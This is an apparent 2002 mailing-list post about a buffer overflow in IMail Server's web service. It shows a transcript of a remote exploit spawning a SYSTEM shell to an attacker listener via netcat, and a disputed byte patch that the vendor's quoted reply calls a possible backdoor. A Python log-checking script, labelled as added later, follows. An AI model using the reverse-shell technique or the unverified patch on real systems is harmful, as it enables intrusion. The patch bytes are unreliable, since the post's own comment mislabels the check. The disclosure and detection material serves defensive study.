xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx HTTP/1.0
Connection closed by foreign host.

uh oh, that isn't supposed to happen!@ let's chex those logs!

20020729 162041 Info - 192.168.0.1 GET / HTTP/1.0.
20020729 162423 Info - 192.168.0.1 GET xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.
20020729 162423 Web Error Problem in ThreadProc - Socket 380 on port 8383 from 192.168.0.1.

hey, look mom.. a dead thread!
looks like an overflow to me, let's use that elite exploit I found on bugtraq!@

xx@xxx:~$ ./imailexp 192.168.0.2 8383 192.168.0.1 3333
IMail 7.11 remote exploit (SYSTEM level)
2c79cbe14ac7d0b8472d3f129fa1df55 ([EMAIL PROTECTED])
ret: 0x10012490 (IMailsec.dll v.2.6.17.28)
connecting...done.
dumping payload...done.
cmd.exe spawned to [192.168.0.1:3333]

xx@xxx:~$ nc -l -p 3333
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

D:\WINNT\system32>

seems to work fine to me.. what the hell is going on at Ipswitch? is it time to fire someone?

as for the patch being a vulnerability.. the binary was compiled with the default switches using Borland C++ 5.5 so that's why it's large.. but it's the same damn source, so fuck the binary then.. compile from the source:

char p1[] = {0x00,0x30}; //extend text section to make room for our code
char p2[] = {0xe8,0xa1,0x98,0x04,0x00,0x90}; //on a command request, CALL 4A345E;NOP
char p3[] = {0x81,0xbc,0x24,0x58,0x03,0x00,0x00,0x47,0x45,0x54,0x20,0x75,0x08,0xc6,0x84,0x24,0xb2,0x03,0x00,0x00,0x00,0x8d,0x85,0xf0,0xed,0xff,0xff,0xc3}; //disassembly below

.text:004A345E cmp [esp+arg_354], 20544547h
.text:004A3469 jnz short loc_4A3473 //is the argument "USER"? no? get out of this shit
.text:004A346B mov [esp+arg_3AE], 0 //yes? limit argument to 90 bytes
.text:004A3473 loc_4A3473: ; CODE XREF: sub_4A345E+Bj
.text:004A3473 lea eax, [ebp-1210h] //shit we ran over to get here
.text:004A3479 retn

huh? looks like a backdoor to me..

@!$?@!?$@!?%2@$42144@!$@!%?@!$@!%?@!$,
2c79cbe14ac7d0b8472d3f129fa1df55

>Hello,
>
>In message 284465 there is an "exploit" of IMail Server from Ipswitch listed.
>http://online.securityfocus.com/archive/1/284465
>We have been unable to duplicate the problem and the code attached to the above message is unknown in nature. We suspect that the "patch" released in the message is actually designed to open a vulnerability.
>At this time we are advising our users that this advisory is a hoax and to not apply the patch. I would like to request that the message be removed to prevent further confusion.
>
>Thank you.
>
>John Korsak
>Product Marketing Manager, IMail Server
>(781) 676-5789
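A defender-side addition, not code from the post or from Ipswitch: a small Python checker for the IMail web-log format quoted above. It flags requests whose logged target is unusually long and ties a following "Problem in ThreadProc" error from the same client to that request, which is the pattern the poster's log excerpt shows. The sample lines are constructed to match the excerpt, and the 200-byte threshold and 5-second window are assumptions.

```python
import re
from datetime import datetime

# Constructed sample modelled on the IMail web log excerpt quoted in the post
# (same timestamps and addresses; the long target is 250 'x' characters).
SAMPLE_LOG = (
    "20020729 162041 Info - 192.168.0.1 GET / HTTP/1.0.\n"
    "20020729 162423 Info - 192.168.0.1 GET " + "x" * 250 + ".\n"
    "20020729 162423 Web Error Problem in ThreadProc - Socket 380 on port 8383 from 192.168.0.1.\n"
)

REQ_RE = re.compile(r"^(\d{8} \d{6}) Info - (\S+) (\S+) (\S+)")
ERR_RE = re.compile(r"^(\d{8} \d{6}) Web Error Problem in ThreadProc - "
                    r"Socket (\d+) on port (\d+) from (\S+)\.$")
LONG_TARGET = 200   # assumed: logged request targets this long are worth flagging
WINDOW_SECONDS = 5  # assumed: how long after a request a thread death is tied to it

def parse_ts(stamp):
    """IMail log timestamps are 'YYYYMMDD HHMMSS'."""
    return datetime.strptime(stamp, "%Y%m%d %H%M%S")

def analyze(lines):
    """Return alerts for oversized request targets and for 'Problem in ThreadProc'
    errors that follow one from the same client within WINDOW_SECONDS."""
    oversized = []  # (timestamp, client ip, target length)
    alerts = []
    for line in lines:
        m = REQ_RE.match(line)
        if m:
            stamp, ip, method, target = m.groups()
            target = target.rstrip(".")  # the logger appends a trailing period
            if len(target) >= LONG_TARGET:
                oversized.append((parse_ts(stamp), ip, len(target)))
                alerts.append({"kind": "oversized_request", "ip": ip,
                               "method": method, "length": len(target)})
            continue
        m = ERR_RE.match(line)
        if m:
            stamp, sock, port, ip = m.groups()
            when = parse_ts(stamp)
            for seen_at, seen_ip, length in oversized:
                if seen_ip == ip and 0 <= (when - seen_at).total_seconds() <= WINDOW_SECONDS:
                    alerts.append({"kind": "request_crashed_thread", "ip": ip,
                                   "port": int(port), "socket": int(sock), "length": length})
                    break
    return alerts

def analyze_sample():
    """Run the checker over the constructed sample log."""
    return analyze(SAMPLE_LOG.splitlines())
```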